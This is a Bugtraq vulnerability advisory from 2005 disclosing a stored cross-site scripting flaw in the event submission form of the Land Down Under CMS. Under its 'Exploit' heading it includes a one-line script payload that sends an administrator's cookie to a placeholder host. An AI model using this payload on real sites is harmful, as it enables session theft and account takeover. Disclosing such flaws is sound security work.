Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Land Down Under 'events.php' Cross Site Scripting Vulnerability

From: conor.e.buckley () gmail com
Date: 5 Sep 2005 20:11:45 -0000
In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS.

When submitting an event, the "Description" field is vulnerable to HTML injection.  Any user logged in can submit an 
event but an admin must approve of the event before being publicly viewed.  Using javascript, an admin's cookie can be 
stolen.

Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>


LDU 801 and earlier are vulnerable.

--------------------------------
conor.e.buckley () gmail com
http://quixote.at.preempted.net
Previous By Date Next
Previous By Thread Next

Current thread: